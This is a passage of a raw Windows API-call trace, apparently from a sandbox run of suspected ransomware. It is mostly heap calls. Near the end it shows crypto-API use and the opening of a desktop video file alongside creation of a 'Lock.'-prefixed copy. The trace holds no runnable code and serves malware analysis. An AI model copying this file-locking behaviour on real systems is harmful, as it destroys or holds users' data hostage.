dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0189.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0189.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0189.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0189.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0189.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0189.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0189.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0189.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0189.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0189.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0189.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0189.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0189.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0189.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0189.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0189.539] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.539] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0189.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0189.540] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.540] CryptDestroyHash (hHash=0xa87050) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.542] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0189.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.557] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/mpe9Fe1_ci-oIpS.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\mpe9fe1_ci-oips.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0189.557] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.557] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0189.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0189.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0189.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0189.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0189.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.mpe9Fe1_ci-oIpS.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.mpe9fe1_ci-oips.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0189.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0189.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0189.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.560] 